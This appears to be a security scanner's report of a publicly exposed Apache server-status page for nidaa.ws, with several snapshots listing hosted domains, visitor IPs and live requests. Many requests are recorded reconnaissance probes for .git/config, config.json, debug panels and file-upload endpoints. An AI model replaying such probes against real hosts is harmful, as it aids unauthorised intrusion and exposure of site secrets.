      Current Time: Wednesday, 10-Apr-2024 19:30:47 +03
      Restart Time: Tuesday, 09-Apr-2024 04:04:48 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 15 hours 25 minutes 59 seconds
      Server load: 0.22 0.28 0.31
      Total accesses: 149302 - Total Traffic: 14.1 GB - Total Duration: 130759464
      CPU Usage: u458.19 s78.7 cu98.12 cs20.22 - .462% CPU load
      1.05 requests/sec - 104.2 kB/second - 99.1 kB/request - 875.805 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 139 idle workers
      K__________W____________K__K____________W______________K________
      _______________________________K_____________K_______________...
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      .............................____RK__R________________..........
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0214491/1056/1188K
      92.884268180466.875.3883.14
      172.70.243.27http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0214490/926/1037_
      92.78244192806300.044.40111.07
      199.45.154.23http/1.1php.we3dvi.com:80PRI * HTTP/2.0
      
      0-0214490/885/1107_
      92.7727892234560.048.5365.47
      167.99.210.137http/1.1garndhabi.org:443GET /assets/plugins/gritter/.DS_Store HTTP/1.1
      
      0-0214490/1022/1300_
      92.76282294447990.092.51107.72
      167.99.210.137http/1.1garndhabi.org:443GET /assets/plugins/bootstrap-select2/.DS_Store HTTP/1.1
      
      0-0214490/899/1078_
      92.848432984280.0110.49119.09
      5.110.93.51http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/lib/tippy/tip
      
      0-0214490/882/1164_
      92.77279283515360.082.13102.59
      167.99.210.137http/1.1garndhabi.org:443GET /assets/plugins/datatables-responsive/.DS_Store HTTP/1.1
      
      0-0214490/1241/1475_
      92.7915412967620.0117.33130.09
      216.244.66.198http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-0214490/1043/1316_
      92.6619425636770.097.12105.54
      199.45.155.39http/1.1
      
      0-0214490/792/1059_
      92.845004442500.058.4467.41
      35.222.190.7http/1.1akg.sa:80GET / HTTP/1.1
      
      0-0214490/1070/1203_
      92.762813164450290.0142.82160.79
      167.99.210.137http/1.1garndhabi.org:443GET /assets/plugins/breakpoints/.DS_Store HTTP/1.1
      
      0-0214490/844/1011_
      92.7628614717870.0103.30115.03
      167.99.210.137http/1.1garndhabi.org:443GET /assets/js/.DS_Store HTTP/1.1
      
      0-0214490/828/1216W
      92.743803731820.0121.41130.22
      35.222.190.7http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-0214490/1127/1250_
      92.85491962678770.071.2184.92
      35.187.132.97http/1.1akg.sa:443GET / HTTP/1.1
      
      0-0214490/995/1206_
      92.584013779990.0157.21187.37
      107.178.232.242http/1.1
      
      0-0214490/1024/1259_
      92.67176376704060.058.2170.60
      199.45.155.39http/1.1
      
      0-0214490/879/1105_
      92.77275265273210.088.88124.57
      167.99.210.137http/1.1garndhabi.org:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-0214490/718/912_
      92.8011885765490.051.5767.48
      66.249.64.35http/1.1alnwisher.com:443GET / HTTP/1.1
      
      0-0214490/1134/1387_
      92.8010802442590.082.59103.21
      54.36.148.251http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=726&t=54.36.148.91&c=5 HTTP/1
      
      0-0214490/994/1157_
      92.7628403809920.0101.30124.51
      54.36.148.22http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1000&t=54.36.150.68&c=5 HTTP/
      
      0-0214490/928/1029_
      92.855036297910.064.9675.71
      35.222.190.7http/1.1akg.sa:443GET /_next/static/chunks/pages/_error.js?ts=1712766590220 HTTP/
      
      0-0214490/880/1047_
      92.6621712396540.0187.23196.03
      199.45.154.23http/1.1
      
      0-0214490/967/1141_
      92.4026023847710.0100.90111.10
      199.45.154.23http/1.1
      
      0-0214490/867/1012_
      92.8845212470710.072.0782.37
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-0214490/1026/1232_
      92.727437266480.0147.51171.42
      207.231.107.133http/1.1
      
      0-0214491/755/1093K
      92.88013017870.9144.09164.84
      172.70.242.15http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-0214790/933/1047_
      89.09282134951310.0118.87123.55
      167.99.210.137http/1.1garndhabi.org:443GET /assets/plugins/bootstrap-tag/.DS_Store HTTP/1.1
      
      1-0214790/797/1044_
      89.1216204683960.0156.70185.27
      54.36.148.121http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=976&t=54.36.150.77&c=5 HTTP/1
      
      1-0214791/786/954K
      89.22413068650.853.5174.51
      162.158.94.228http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-0214790/1125/1332_
      89.1212112569420.0124.22171.87
      167.94.138.127http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      1-0214790/1024/1337_
      88.9621413987590.0121.12132.18
      199.45.154.23http/1.1
      
      1-0214790/881/1058_
      89.08285312775920.0129.60149.07
      167.99.210.137http/1.1garndhabi.org:443GET /assets/js/json/.DS_Store HTTP/1.1
      
      1-0214790/840/1117_
      89.11274262288140.061.3082.06
      167.99.210.137http/1.1garndhabi.org:443GET /config.json HTTP/1.1
      
      1-0214790/802/975_
      89.10276517001980.047.4759.00
      185.220.101.11http/1.1jilani.com.sa:80GET / HTTP/1.1
      
      1-0214790/976/1120_
      89.1125417535190.058.6766.07
      199.45.154.23ht
      Found on 2024-04-10 16:30
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df73f3026af

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.58 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Mar 19 2024 23:10:28
      
      Current Time: Thursday, 28-Mar-2024 09:00:39 +03
      Restart Time: Thursday, 21-Mar-2024 04:04:48 +03
      Parent Server Config. Generation: 4
      Parent Server MPM Generation: 3
      Server uptime:  7 days 4 hours 55 minutes 51 seconds
      Server load: 0.01 0.04 0.05
      Total accesses: 1001458 - Total Traffic: 143.1 GB - Total Duration: 2258110801
      CPU Usage: u463.7 s52.63 cu3606.86 cs979.66 - .82% CPU load
      1.61 requests/sec - 241.0 kB/second - 149.8 kB/request - 2254.82 ms/request
      38 requests currently being processed, 0 workers gracefully restarting, 87 idle workers
      KK_K___K____KK______K____.......................................
      ................................................................
      ......................_____KK___K_K__KK_K_____K_K__RKK___K______
      ____KK__K____K_KK___K___R__KK__K_K___K________KKW____KK___......
      ................................................................
      ................................................................
      ................................................................
      ..WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW............
      ................................................................
      ................................................................
      ............................................................WWWW
      WWWWWWWWWWWWWWWWWWWWW...........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-3271581/174/5521K
      20.600071809210.835.83627.94
      162.158.87.109http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-3271581/184/5573K
      20.5401666034066.641.211137.60
      172.70.246.173http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/191/5688_
      20.482143869150060.073.25951.71
      195.191.219.132http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-3271581/166/5673K
      20.600177061460.819.96648.18
      172.69.150.121http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-3271580/130/5369_
      20.5337064816330.028.62863.62
      54.36.149.27http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=945&t=54.36.149.99&c=5 HTTP/1
      
      0-3271580/140/5527_
      20.52175356801180.09.58759.86
      66.249.64.8http/1.1hawsab.me:80GET /?ben1048wxlcirb514.html HTTP/1.1
      
      0-3271580/146/5809_
      20.46288063470730.042.49711.36
      85.208.96.195http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1596&l_n=1&page=1&user=web HTTP
      
      0-3271581/111/5329K
      20.5904910666785219.95.14583.30
      162.158.94.135http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-3271580/177/5712_
      20.46265066913910.09.47921.61
      145.220.91.19http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-3271580/154/5827_
      20.48229196661440.021.75766.25
      40.77.167.19http/1.1albayan.edu.sa:443GET /imgweb/cur41/9th/9th%20Grammar%20WB%20T1%2019.pdf HTTP/1.1
      
      0-3271580/124/5560_
      20.5312077135200.011.43880.09
      54.36.148.102http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=919&t=54.36.150.120&c=5 HTTP/
      
      0-3271580/175/5403_
      20.453367956173820.018.24733.45
      52.167.144.192http/1.1albayan.edu.sa:443GET /e_sch/profile.php?user=web&profile=191 HTTP/1.1
      
      0-3271581/168/5560K
      20.550181266930.88.92676.67
      172.71.98.156http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-3271581/141/5335K
      20.5402678037566.78.13800.92
      172.71.98.213http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/198/5744_
      20.4631712067305400.07.26916.40
      172.70.38.55http/1.1support.daaris.com:443GET /submitticket.php?deptid=6&language=czech&step=2 HTTP/1.1
      
      0-3271580/170/5453_
      20.492084875839010.09.681033.79
      185.191.171.10http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=868&page=1&user=web HTTP/1.1
      
      0-3271580/98/5637_
      20.540281549900.05.56747.37
      172.71.131.66http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/95/5522_
      20.44359268015690.015.74821.37
      104.233.224.194http/1.1jawad.com.sa:443GET /public/front_resources/images/default/no_image.png HTTP/1.
      
      0-3271580/135/5645_
      20.5119428055709090.039.72842.52
      40.77.167.2http/1.1albayan.edu.sa:443GET /imgweb/ektebar2222141510.png HTTP/1.1
      
      0-3271580/138/5416_
      20.49203188118120.011.53930.21
      31.167.169.234http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-3271581/158/5256K
      20.5433830041467.047.96929.71
      172.71.154.99http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/168/5099_
      20.550262446420.070.39909.67
      162.158.94.240http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/134/5447_
      20.5373668398630.08.341107.91
      46.52.15.176http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-3271580/116/5147_
      20.52138076535260.016.211078.37
      54.36.149.28http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=542&t=54.36.148.64&c=5 HTTP/
      
      0-3271580/175/5348_
      20.511920108331630.06.44825.90
      185.191.171.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1281&l_n=1&page=1&user=web HTTP
      
      1-2-0/0/4331.
      0.0017887043423670.00.00607.71
      54.188.147.190http/1.13dvi.com:80GET / HTTP/1.1
      
      1-2-0/0/4387.
      0.001788791164646570.00.00690.80
      54.36.148.87http/1.1daris.live:443GET /category/User%20Experience HTTP/1.1
      
      1-2-0/0/4093.
      0.0017887142455580.00.00629.11
      77.31.246.66http/1.1wahjcm.com:443GET /favicon.ico HTTP/1.1
      
      1-2-0/0/3873.
      0.0017887064090760.00.00534.75
      54.36.148.153http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=852&t=54.36.148.223&c=5 HTTP/
      
      1-2-0/0/4389.
      0.0017887241345410.00.00814.36
      172.68.26.5http/1.1support.daaris.com:443GET /templates/new/assets/css/main.css HTTP/1.1
      
      1-2-0/0/4630.
      0.001788735138858960.00.00584.77
      66.249.70.65http/1.1sulaimaniya.edu.sa:443GET /%D9%85%D8%AA%D8%B7%D9%84%D8%A8%D8%A7%D8%AA-%D8%A7%D9%84%D8
      
      1-2-0/0/4258.
      0.001788722546715220.00.00611.59
      185.191.171.4http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=110 HTTP/1.1
      
      
      Found on 2024-03-28 06:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7d66a7fb1

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.58 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Mar 19 2024 23:10:28
      
      Current Time: Thursday, 28-Mar-2024 09:00:39 +03
      Restart Time: Thursday, 21-Mar-2024 04:04:48 +03
      Parent Server Config. Generation: 4
      Parent Server MPM Generation: 3
      Server uptime:  7 days 4 hours 55 minutes 50 seconds
      Server load: 0.01 0.04 0.05
      Total accesses: 1001447 - Total Traffic: 143.1 GB - Total Duration: 2258110679
      CPU Usage: u463.64 s52.63 cu3606.86 cs979.66 - .82% CPU load
      1.61 requests/sec - 241.0 kB/second - 149.8 kB/request - 2254.85 ms/request
      27 requests currently being processed, 0 workers gracefully restarting, 98 idle workers
      _K_____W____KK______K____.......................................
      ................................................................
      ......................_____KK___K_K__K________K____RKK___K______
      _____K__K____K_KK___K___R___K____K___K_______________KK___......
      ................................................................
      ................................................................
      ................................................................
      ..WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW............
      ................................................................
      ................................................................
      ............................................................WWWW
      WWWWWWWWWWWWWWWWWWWWW...........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-3271580/173/5520_
      20.4341423571809200.035.83627.94
      194.146.24.44http/1.1trynidaa.com:443GET /wp-login.php HTTP/1.1
      
      0-3271581/184/5573K
      20.5401666034066.641.211137.60
      172.70.246.173http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/191/5688_
      20.482143869150060.073.25951.71
      195.191.219.132http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-3271580/165/5672_
      20.43392277061440.019.96648.18
      54.167.223.174http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-3271580/130/5369_
      20.5337064816330.028.62863.62
      54.36.149.27http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=945&t=54.36.149.99&c=5 HTTP/1
      
      0-3271580/140/5527_
      20.52175356801180.09.58759.86
      66.249.64.8http/1.1hawsab.me:80GET /?ben1048wxlcirb514.html HTTP/1.1
      
      0-3271580/146/5809_
      20.46288063470730.042.49711.36
      85.208.96.195http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1596&l_n=1&page=1&user=web HTTP
      
      0-3271580/110/5328W
      20.4200106666850.04.92583.09
      162.158.94.135http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-3271580/177/5712_
      20.46265066913910.09.47921.61
      145.220.91.19http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-3271580/154/5827_
      20.48229196661440.021.75766.25
      40.77.167.19http/1.1albayan.edu.sa:443GET /imgweb/cur41/9th/9th%20Grammar%20WB%20T1%2019.pdf HTTP/1.1
      
      0-3271580/124/5560_
      20.5312077135200.011.43880.09
      54.36.148.102http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=919&t=54.36.150.120&c=5 HTTP/
      
      0-3271580/175/5403_
      20.453367956173820.018.24733.45
      52.167.144.192http/1.1albayan.edu.sa:443GET /e_sch/profile.php?user=web&profile=191 HTTP/1.1
      
      0-3271581/168/5560K
      20.550181266930.88.92676.67
      172.71.98.156http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-3271581/141/5335K
      20.5402678037566.78.13800.92
      172.71.98.213http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/198/5744_
      20.4631712067305400.07.26916.40
      172.70.38.55http/1.1support.daaris.com:443GET /submitticket.php?deptid=6&language=czech&step=2 HTTP/1.1
      
      0-3271580/170/5453_
      20.492084875839010.09.681033.79
      185.191.171.10http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=868&page=1&user=web HTTP/1.1
      
      0-3271580/98/5637_
      20.540281549900.05.56747.37
      172.71.131.66http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/95/5522_
      20.44359268015690.015.74821.37
      104.233.224.194http/1.1jawad.com.sa:443GET /public/front_resources/images/default/no_image.png HTTP/1.
      
      0-3271580/135/5645_
      20.5119428055709090.039.72842.52
      40.77.167.2http/1.1albayan.edu.sa:443GET /imgweb/ektebar2222141510.png HTTP/1.1
      
      0-3271580/138/5416_
      20.49203188118120.011.53930.21
      31.167.169.234http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-3271581/158/5256K
      20.5423830041467.047.96929.71
      172.71.154.99http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/168/5099_
      20.550262446420.070.39909.67
      162.158.94.240http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/134/5447_
      20.5373668398630.08.341107.91
      46.52.15.176http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-3271580/116/5147_
      20.52138076535260.016.211078.37
      54.36.149.28http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=542&t=54.36.148.64&c=5 HTTP/
      
      0-3271580/175/5348_
      20.511920108331630.06.44825.90
      185.191.171.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1281&l_n=1&page=1&user=web HTTP
      
      1-2-0/0/4331.
      0.0017887043423670.00.00607.71
      54.188.147.190http/1.13dvi.com:80GET / HTTP/1.1
      
      1-2-0/0/4387.
      0.001788791164646570.00.00690.80
      54.36.148.87http/1.1daris.live:443GET /category/User%20Experience HTTP/1.1
      
      1-2-0/0/4093.
      0.0017887142455580.00.00629.11
      77.31.246.66http/1.1wahjcm.com:443GET /favicon.ico HTTP/1.1
      
      1-2-0/0/3873.
      0.0017887064090760.00.00534.75
      54.36.148.153http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=852&t=54.36.148.223&c=5 HTTP/
      
      1-2-0/0/4389.
      0.0017887241345410.00.00814.36
      172.68.26.5http/1.1support.daaris.com:443GET /templates/new/assets/css/main.css HTTP/1.1
      
      1-2-0/0/4630.
      0.001788735138858960.00.00584.77
      66.249.70.65http/1.1sulaimaniya.edu.sa:443GET /%D9%85%D8%AA%D8%B7%D9%84%D8%A8%D8%A7%D8%AA-%D8%A7%D9%84%D8
      
      1-2-0/0/4258.
      0.001788722546715220.00.00611.59
      185.191.171.4http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=110 HTTP/1.1
      
      1-2
      Found on 2024-03-28 06:00
  • Apache server-status page is publicly available
    First seen 2024-05-15 21:57
    Last seen 2024-06-21 05:17
    Open for 36 days
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140cde1174a

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 21-Jun-2024 08:17:41 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  10 days 4 hours 14 minutes 36 seconds
      Server load: 0.05 0.10 0.17
      Total accesses: 865019 - Total Traffic: 96.0 GB - Total Duration: 1963971479
      CPU Usage: u443.23 s26.83 cu3844.81 cs793.16 - .581% CPU load
      .984 requests/sec - 114.5 kB/second - 116.4 kB/request - 2270.44 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 87 idle workers
      ____________K_K_KW_________________R____K__K______..............
      ................W...............................................
      ......................K__K__________________K__.................
      ........___________K_C_K_________...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5292900/80/4010_
      1.342260304540710.03.00381.22
      52.230.152.159http/1.1albayan.edu.sa:80GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D8%B3%D8%A6%D9%84%
      
      0-5292900/8/3500_
      1.37120014475370.00.42357.16
      66.249.66.1http/1.13dvi.com:80GET /v/privacy.html HTTP/1.1
      
      0-5292900/10/3486_
      1.407665835704300.00.13460.89
      64.225.75.246http/1.1zed.sa:443GET /.git/config HTTP/1.1
      
      0-5292900/8/3700_
      1.38889197286210.00.76285.97
      64.225.75.246http/1.1zed.sa:443GET / HTTP/1.1
      
      0-5292900/9/3797_
      1.3088610588120.00.45384.90
      64.225.75.246http/1.1
      
      0-5292900/9/3502_
      1.398684020587900.00.11514.09
      64.225.75.246http/1.1zed.sa:443GET / HTTP/1.1
      
      0-5292900/9/3939_
      1.37180436953510.00.46319.36
      103.231.89.229http/1.1sradmin.3dvi.com:443GET /assets/plugins/jquery-file-upload/server/php/ HTTP/1.1
      
      0-5292900/7/3755_
      1.397964113715510.00.08310.02
      64.225.75.246http/1.1zed.sa:443GET /login.action HTTP/1.1
      
      0-5292900/11/3528_
      1.352071129778310.00.59229.03
      103.231.89.229http/1.1proxy-subdomains-vhost.localhosGET /upload/server/php/ HTTP/1.1
      
      0-5292900/6/3537_
      1.407465028355030.00.07641.88
      64.225.75.246http/1.1zed.sa:443GET /config.json HTTP/1.1
      
      0-5292900/7/3658_
      1.398463910563780.00.08345.92
      64.225.75.246http/1.1zed.sa:443GET /debug/default/view?panel=config HTTP/1.1
      
      0-5292900/8/3501_
      1.4019016020170.00.45426.28
      66.249.66.81http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-5292901/7/3605K
      1.401093885480.60.25245.05
      103.231.89.229http/1.1akgsa.com:80GET /server/php/ HTTP/1.1
      
      0-5292900/8/3875_
      1.3088011684170.00.02267.01
      64.225.75.246http/1.1
      
      0-5292901/8/3849K
      1.404024970510.70.03656.96
      103.231.89.229http/1.1akgsa.com:80GET /fileupload/server/php/ HTTP/1.1
      
      0-5292900/13/3758_
      1.35219010878480.00.69370.21
      52.230.152.159http/1.1albayan.edu.sa:80GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-5292901/10/3699K
      1.41025295220.80.06317.19
      172.70.110.104http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-5292900/15/3583W
      1.240012020630.00.95375.90
      162.158.63.138http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-5292900/13/3387_
      1.3520486368730.00.15350.86
      103.231.89.229http/1.1proxy-subdomains-vhost.localhosGET /admin/server/php/ HTTP/1.1
      
      0-5292900/22/3011_
      1.40207693910.00.55369.16
      103.231.89.229http/1.1akgsa.com:80GET /upload/server/php/ HTTP/1.1
      
      0-5292900/8/3384_
      1.352018848419270.00.06345.54
      103.231.89.229http/1.1proxy-subdomains-vhost.localhosGET /fileupload/server/php/ HTTP/1.1
      
      0-5292900/9/3689_
      1.3520109862860.00.03258.69
      52.230.152.159http/1.1albayan.edu.sa:80GET /imgweb/1445/%D8%B1%D9%8A%D8%A7%D8%B6%D9%8A%D8%A7%D8%AA%20%
      
      0-5292900/9/3709_
      1.3519805515930.00.11367.76
      52.230.152.159http/1.1albayan.edu.sa:80GET /web/23.html2 HTTP/1.1
      
      0-5292900/6/3448_
      1.351981010305690.00.03470.66
      103.231.89.229http/1.1proxy-subdomains-vhost.localhosGET /server/php/ HTTP/1.1
      
      0-5292900/9/3799_
      1.361844315102700.00.24331.18
      103.231.89.229http/1.1sradmin.3dvi.com:443GET /assets/jquery-file-upload/server/php/ HTTP/1.1
      
      1-5293180/8/3603_
      1.3412062635809160.00.09452.79
      66.249.66.20http/1.13dvi.com:443GET /v/privacy.html HTTP/1.1
      
      1-5293180/9/3159_
      1.3583676101201180.00.10424.55
      64.225.75.246http/1.1zed.sa:443GET /v2/_catalog HTTP/1.1
      
      1-5293180/8/3585_
      1.26880627275690.00.05284.93
      64.225.75.246http/1.1
      
      1-5293180/9/3446_
      1.35846548140490.00.72197.62
      64.225.75.246http/1.1zed.sa:443GET /server HTTP/1.1
      
      1-5293180/13/3629_
      1.3219308040320.00.48263.73
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-5293180/7/3517_
      1.268809838310.00.02396.30
      64.225.75.246http/1.1
      
